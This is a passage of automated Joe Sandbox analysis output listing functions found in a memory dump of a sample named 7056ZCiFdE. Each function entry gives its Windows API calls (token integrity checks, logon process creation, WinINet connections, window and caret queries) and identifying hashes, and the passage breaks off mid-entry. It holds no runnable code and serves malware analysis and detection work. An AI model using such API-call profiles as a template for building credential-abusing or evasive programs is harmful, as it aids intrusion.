                                      • Part of subcall function 008E3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008E365B
                                      • Part of subcall function 008E3641: GetCurrentThreadId.KERNEL32 ref: 008E3662
                                      • Part of subcall function 008E3641: AttachThreadInput.USER32(00000000,?,008E5005), ref: 008E3669
                                    • GetCaretPos.USER32(?), ref: 00904F13
                                    • ClientToScreen.USER32(00000000,?), ref: 00904F4E
                                    • GetForegroundWindow.USER32 ref: 00904F54
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                    • String ID:
                                    • API String ID: 2759813231-0
                                    • Opcode ID: ce588fae6e2ee114f6ece072dc4766e26f1f0bbd922f85649b5422ce740bb896
                                    • Instruction ID: 0cf0edd02739db2528c3c50a57132916efbedc6f5c360ca52567991443acffb3
                                    • Opcode Fuzzy Hash: ce588fae6e2ee114f6ece072dc4766e26f1f0bbd922f85649b5422ce740bb896
                                    • Instruction Fuzzy Hash: 38312D71E00108AFCB10EFB9C8859EFB7F9FF99304F10406AE555E7251DA719E058BA1
                                    Function 008D8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008D810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008D8121
                                      • Part of subcall function 008D810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008D812B
                                      • Part of subcall function 008D810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D813A
                                      • Part of subcall function 008D810A: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008D8141
                                      • Part of subcall function 008D810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8157
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008D86A3
                                    • _memcmp.LIBCMT ref: 008D86C6
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008D86FC
                                    • HeapFree.KERNEL32(00000000), ref: 008D8703
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                    • String ID:
                                    • API String ID: 2182266621-0
                                    • Opcode ID: c929d74388e0a9313bd7d038efb04149284b3fac4d9cc2d5aa13ee8d6f1bcab1
                                    • Instruction ID: fada22dd4d06abc14052cfe71289f81dad1ae72761c40bc7d80c66b70fb235d8
                                    • Opcode Fuzzy Hash: c929d74388e0a9313bd7d038efb04149284b3fac4d9cc2d5aa13ee8d6f1bcab1
                                    • Instruction Fuzzy Hash: 99215771E04208EFDB10DFA8D949BAEB7B8FF54314F15415AE444AB240EB30AE05DB90
                                    Function 008A098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                    Download Yara Rule
                                    APIs
                                    • __setmode.LIBCMT ref: 008A09AE
                                      • Part of subcall function 00885A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7896,?,?,00000000), ref: 00885A2C
                                      • Part of subcall function 00885A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7896,?,?,00000000,?,?), ref: 00885A50
                                    • _fprintf.LIBCMT ref: 008A09E5
                                    • OutputDebugStringW.KERNEL32(?), ref: 008D5DBB
                                      • Part of subcall function 008A4AAA: _flsall.LIBCMT ref: 008A4AC3
                                    • __setmode.LIBCMT ref: 008A0A1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                    • String ID:
                                    • API String ID: 521402451-0
                                    • Opcode ID: b932586476877fb18e36d6c22bba1d8a0b2464c3839a2d38cca2513669c1f67b
                                    • Instruction ID: 77ee4553128fea0135998c5cc700f79aa0a81f87ef136e97246af3869530a514
                                    • Opcode Fuzzy Hash: b932586476877fb18e36d6c22bba1d8a0b2464c3839a2d38cca2513669c1f67b
                                    • Instruction Fuzzy Hash: F91127319042086FEB04B7BCAC479BE7B69FF87320F240126F105D6582EEA0584297A2
                                    Function 008F1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008F17A3
                                      • Part of subcall function 008F182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008F184C
                                      • Part of subcall function 008F182D: InternetCloseHandle.WININET(00000000), ref: 008F18E9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Internet$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 1463438336-0
                                    • Opcode ID: 6702278a1054cee3af06f88986660fea9abf71debde11260e9a62640004e4bb2
                                    • Instruction ID: fd94f43bad0f274b0350a27f0add65e4f12e376a94c2e7b7a4d7d14365b9aed5
                                    • Opcode Fuzzy Hash: 6702278a1054cee3af06f88986660fea9abf71debde11260e9a62640004e4bb2
                                    • Instruction Fuzzy Hash: 2B21B031214609FFEF129F748C04BBABBA9FF48751F14402AFA05D6550D7719911A7A1
                                    Function 008E3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNEL32(?,0090FAC0), ref: 008E3A64
                                    • GetLastError.KERNEL32 ref: 008E3A73
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 008E3A82
                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0090FAC0), ref: 008E3ADF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                    • String ID:
                                    • API String ID: 2267087916-0
                                    • Opcode ID: 3f60b92178df2e88d2e8940c72279b89434fe95b056cf19c593d6fb3685a1248
                                    • Instruction ID: d6b14c62d13de139fc27d39441b1644bda20088bd25954108afeefc75daa7e34
                                    • Opcode Fuzzy Hash: 3f60b92178df2e88d2e8940c72279b89434fe95b056cf19c593d6fb3685a1248
                                    • Instruction Fuzzy Hash: 3721D6341086119FC710EF29D88586A77E8FF56368F104A2DF499C72A1D731DE85CB83
                                    Function 008DDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008DF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,008DDCD3,?,?,?,008DEAC6,00000000,000000EF,00000119,?,?), ref: 008DF0CB
                                      • Part of subcall function 008DF0BC: lstrcpyW.KERNEL32(00000000,?,?,008DDCD3,?,?,?,008DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008DF0F1
                                      • Part of subcall function 008DF0BC: lstrcmpiW.KERNEL32(00000000,?,008DDCD3,?,?,?,008DEAC6,00000000,000000EF,00000119,?,?), ref: 008DF122
                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,008DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008DDCEC
                                    • lstrcpyW.KERNEL32(00000000,?,?,008DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008DDD12
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,008DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 008DDD46
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    • Opcode ID: 86bf7cbaabf6aef4f04606bc38acb4b80bf116413c563318150ec743694ed913
                                    • Instruction ID: a0be294155fbc25d861b4332450208d96aee59d1c89e98c2408f1e78473ff409
                                    • Opcode Fuzzy Hash: 86bf7cbaabf6aef4f04606bc38acb4b80bf116413c563318150ec743694ed913
                                    • Instruction Fuzzy Hash: C011AC3A200305EFDB25AF64C84597A77AAFF46350B40822AF906CB3A1EB719950DB91
                                    Function 008B50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 008B5101
                                      • Part of subcall function 008A571C: __FF_MSGBANNER.LIBCMT ref: 008A5733
                                      • Part of subcall function 008A571C: __NMSG_WRITE.LIBCMT ref: 008A573A
                                      • Part of subcall function 008A571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001), ref: 008A575F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 567e951994b1b8bdb96f5052dd9e5a8c23b0a6cd21f32e91f72cbce224200909
                                    • Instruction ID: a40908a179727e970d4aedba8bcb4de771709a28e0bb2cc5dab136ccc37c1ccb
                                    • Opcode Fuzzy Hash: 567e951994b1b8bdb96f5052dd9e5a8c23b0a6cd21f32e91f72cbce224200909
                                    • Instruction Fuzzy Hash: 8C11A372904A15EEDF312F7CBC45B9E3798FF063B1B204529FA04D6B61DE30994197A1
                                    Function 008D85B1 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008D85E2
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 008D85E9
                                    • CloseHandle.KERNEL32(00000004), ref: 008D8603
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008D8632
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 2621361867-0
                                    • Opcode ID: a2e2168002e94358064b0a4cc9e11b0657de7d59250bdcfa84199a449cd7204d
                                    • Instruction ID: 260ba0eedc19d614a287d2b15f7820e72fae4a894c95183d577f9d339643c0da
                                    • Opcode Fuzzy Hash: a2e2168002e94358064b0a4cc9e11b0657de7d59250bdcfa84199a449cd7204d
                                    • Instruction Fuzzy Hash: A5114A72504209EFDF118FA4ED49BEE7BA9FF08754F044165FE04E2160C7729E60AB61
                                    Function 008F6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00885A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7896,?,?,00000000), ref: 00885A2C
                                      • Part of subcall function 00885A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7896,?,?,00000000,?,?), ref: 00885A50
                                    • gethostbyname.WS2_32(?), ref: 008F6399
                                    • WSAGetLastError.WS2_32(00000000), ref: 008F63A4
                                    • _memmove.LIBCMT ref: 008F63D1
                                    • inet_ntoa.WS2_32(?), ref: 008F63DC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                    • String ID:
                                    • API String ID: 1504782959-0
                                    • Opcode ID: a46e902e7a8567f2046a457263302a4b200825b9a355045e117f5f9898ec52e3
                                    • Instruction ID: 4bb1b758ff8f58bb26781fb843f46a7e663be710948cb0977c4ee29918a296a2
                                    • Opcode Fuzzy Hash: a46e902e7a8567f2046a457263302a4b200825b9a355045e117f5f9898ec52e3
                                    • Instruction Fuzzy Hash: 45111C36500109AFCB04FBA8DD96CEEB7B8FF08314B144165F506E7261DB31AE14DB62
                                    Function 008D8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 008D8B61
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D8B73
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D8B89
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D8BA4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 646dd5eaf05a82f6708a3fe4d62c5126d2db155acd658b03c0d68e22b8368c09
                                    • Instruction ID: 8c6128a74ee3ecffc00ca7e671360a36d96a6576bdd9d99b5b34225eb640276c
                                    • Opcode Fuzzy Hash: 646dd5eaf05a82f6708a3fe4d62c5126d2db155acd658b03c0d68e22b8368c09
                                    • Instruction Fuzzy Hash: 77112E79901218FFDB11DFA5CC85F9DBB74FB48710F204196E904B7250DA716E11DB94
                                    Function 008E1142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008DFCED,?,008E0D40,?,00008000), ref: 008E115F
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,008DFCED,?,008E0D40,?,00008000), ref: 008E1184
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008DFCED,?,008E0D40,?,00008000), ref: 008E118E
                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,008DFCED,?,008E0D40,?,00008000), ref: 008E11C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CounterPerformanceQuerySleep
                                    • String ID:
                                    • API String ID: 2875609808-0
                                    • Opcode ID: 56149466624f98abca60945f769fa6b6486d94f00c06b038e553c6e1d81e3a6c
                                    • Instruction ID: d3db14b3813dafadf56df853d693b8f92e2b46020769b89eebef5aebd0499f2a
                                    • Opcode Fuzzy Hash: 56149466624f98abca60945f769fa6b6486d94f00c06b038e553c6e1d81e3a6c
                                    • Instruction Fuzzy Hash: 78113C31D0465DEBCF149FA6D848AEEBB78FF0A751F004055EA45F2240CB709690DBD5
                                    Function 008DD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 008DD84D
                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 008DD864
                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008DD879
                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 008DD897
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Type$Register$FileLoadModuleNameUser
                                    • String ID:
                                    • API String ID: 1352324309-0
                                    • Opcode ID: b869ca9879c899d0697698712ee6c095f746f60ffbdaf856f914585868b00877
                                    • Instruction ID: ff66ffdfaee6c94f24fb36dd2dd271112622576a3138da1e79f5b2fb7d38b2f3
                                    • Opcode Fuzzy Hash: b869ca9879c899d0697698712ee6c095f746f60ffbdaf856f914585868b00877
                                    • Instruction Fuzzy Hash: B8118E71605309DFE3219F50EC08F92BBBCFB00B00F108A7AA916C6650D7B0E609ABA1
                                    Function 008B6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                    • String ID:
                                    • API String ID: 3016257755-0
                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                    • Instruction ID: 3bc1bb832ce77332a556f8e630b2262754cb3812461cb3f2a0e918fd4bb85459
                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                    • Instruction Fuzzy Hash: 8701407244864EBBCF166F88CC01CED3F62FB58354F598416FE1898231D636C9B2AB81
                                    Function 0090B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 0090B2E4
                                    • ScreenToClient.USER32(?,?), ref: 0090B2FC
                                    • ScreenToClient.USER32(?,?), ref: 0090B320
                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0090B33B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
